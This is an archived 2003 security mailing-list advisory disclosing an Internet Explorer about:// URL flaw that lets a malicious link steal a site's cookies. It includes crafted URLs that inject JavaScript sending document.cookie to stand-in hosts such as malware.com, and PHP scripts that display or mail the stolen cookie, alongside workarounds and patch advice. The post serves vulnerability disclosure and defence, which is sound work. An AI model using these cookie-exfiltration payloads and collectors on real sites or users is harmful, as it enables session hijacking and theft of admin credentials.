| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: novappc at novappc.com (Lorenzo Hernandez Garcia-Hierro)
Subject: MSIE-5.0.x-6.0.2600.x Remote Cookies Retrieval trought PHP and JavaScript
- REPORT -
Vuln name: PHP and JS Remote cookie retrieval
Risk (1-10): 9
Systems affected: IE 6.0.2600.x (without SP1)
IE 5.0.x (without patches)
Windows XP
Windows NT x
Windows 2003 Server
Windows 9x
Systems implicated:
Web Server
PHP: Any version with getenv support
JavaScript 1.1
User action ( link access )
META REFRESH TAG
IMG TAG
SCRIPT TAG
FRAME
IFRAME
-------------
DESCRIPTION :
-------------
This vulnerability is based on the known Microsoft IE Cookies Exposure via
'About:' URLS with a javascript tag inclusion ( again ), about urls are
dynamic and execute code in the versions of IE that i supply, and the getenv
PHP variables , the PHP getenv variables can be used for retrieve the user
cookies trough a very simple method , i explain it:
------------------
THE VULNERABILITY: ( PROOF OF CONCEPT 1 PART )
------------------
1.- is needed to have a little JAVASCRIPT and PHP knowledge about php
functions , we use echo() and mail() with getenv() , getenv is the function
of php that can retrieve the headers of a http connection , this can be used
by a bad webmaster for get some private info like ip's , hosts , remote
ports and more, but if you use it with JAVASCRIPT scripting , you can
control de user cookies trough the vulnerability of Microsoft MSIE cookies
exposure in ABOUT:// URLS.
2.- About URLS execute and load a JavaScript inclusion , the first way to
access cookies, i discover some pontetial dangerous urls for make the
cookies retrieval but all the time is the final user the person that must
follow the link or visit a malicious page with META REFRESH or similar tags
( view the top )
PONTENTIAL DANGEROUS URLS:
-
about://www.usersite.com/[script%20language=javascript]document.location='ht
tp://malware.com/steal.php?='+document.cookie;[/script]
This a very dangerous url , this url take using the document.location
function of javascript the cookies of www.usersite.com of the user and send
it to test1.php . ( view EXPLAINING THE PHP RETRIEVAL FORM ) .
-
about://www.usersite.com/[script]window.open('http://malicious.com/cooktheus
er.php?'+document.cookie)[/script]
- Please , note the ? because the php file only gets the QUERY_STRING.
- + document.cookie use the about:// url for get the
about://www.usersite.com
cookies ( the user must visit this www.usersite.com before visit the link
and the www.usersite.com must have saved cookies in the victim computer ).
---------------------------------
EXPLAINING THE PHP RETRIEVAL FORM ( PROOF OF CONCEPT 2 PART )
---------------------------------
We use PHP files because this language has a very good get environment
functions, i made some testing files: test1.php only shows to the user with
echo() the result of the retrieve, test2.php mail to the specified recipient
the result of cookie retrieval.
For retrieve the cookies we use the getenv() function by value QUERY_STRING
because this is a rapid method for it and clean , easier than other,
QUERY_STRING only save the remote cookie because the malicious url includes
a ?'+document.cookie) .
The malicious url only must point to the php script and in the end must have
a +document.cookie because the about url gets the cookie of the
about://www.usersite.com and prints it into the ?>document.cookie
The code for show to the user the content of his cookie is:
[?php
// NSRG-05-09 TEST1.PHP
// THIS TESTS THE COOKIES RETRIEVAL
// COPYRIGHT NSRG 2003
$test1 = getenv("QUERY_STRING");
echo '<strong>This is your cookie content of your site</strong><br><br>';
echo "$test1";
echo '<br><br><h3>You are vulnerable...IE.</h3>';
echo '<br><br><h3>NSRG-05-9 PHP and JS Cookies retrieval</h3>';
?]
The code for mail the cookie is :
[?php
// NSRG-05-09 TEST1.PHP
// THIS TESTS THE COOKIES RETRIEVAL
// COPYRIGHT NSRG 2003
$test2 = getenv("QUERY_STRING");
$msg = "\t NSRG - 05 - 9 \n
\tCOOKIE: $test2 \n
\tTHIS IS THE COOKIE CONTENT RETRIEVED TROUGH THE NSRG-05-9 REPORT \n";
$recipient = "you@...com";
$subject = "REMOTE COOKIEL RETRIEVAL TROUGH PHP NSRG-05-9";
$mailheaders = "From: NSRG PHP File <ops> \n";
$mailheaders .= "Reply-To: anybody\n\n";
mail($recipient, $subject, $msg, $mailheaders);
?]
------------------
WHAT CAN BE HAPPEN?
------------------
Cookies from your site can be stolen using this , if you are using a
PHP-Nuke portal the admin password can be retrieved by a malicious user and
base64 decoded. Generally only this can be used for get personal info on a
vulnerable MSIE machine.
------------------
WORKAROUND & SOLUTION
------------------
1.- Don't use IE , ;-)
2.- Apply the correct patch regarding the php-nuke portal base64
code-decode.
3.- Apply the MSIE 6.0.2600.x to 6.0.2800.x SERVICE PACK 1, this isthe best
solution but service packs normally come with errors.
4.-You can protect yourself from the vulnerability disabling cookies (at
Tools -> Internet options -> Security -> Customize) but this is a paranoic
solution, we think reprogramming the about url support and disabling with
parse system the tag inclusions of script , this can be easy and safe.
--------------------
MORE INFO ABOUT THIS
--------------------
- This post in txt format:
http://security.novappc.com/nsrg-05-9/nsrg-05-9.txt
- IE about:// urls exposure hole.
http://www.securiteam.com/windowsntfocus/6I00D1535I.html
- Similar vulnerability:
http://www.peacefire.org/security/iecookies/
- Test it , you must visit before use test the www.novappc.com website or
modify the link for each your own cookies website.
http://security.novappc.com/nsrg-05-9/index.html
---------------------------------------
Lorenzo Manuel Hernandez Garcia-Hierro
--- Computer Security Analyzer ---
--Nova Projects Professional Coding--
PGP: Keyfingerprint
B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
**********************************
www.novappc.com NOVAPPC
security.novappc.com NSRG WEBSITE
www.lorenzohgh.com
______________________
Powered by blists - more mailing lists